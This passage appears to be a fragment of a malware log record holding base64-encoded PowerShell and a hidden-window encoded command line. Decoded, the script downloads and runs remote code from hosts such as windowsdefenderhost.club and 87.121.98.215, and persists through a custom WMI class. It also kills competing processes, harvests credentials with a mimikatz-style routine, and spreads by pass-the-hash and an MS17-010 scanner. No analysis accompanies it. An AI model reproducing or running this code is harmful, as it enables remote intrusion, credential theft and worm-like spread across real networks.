uADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0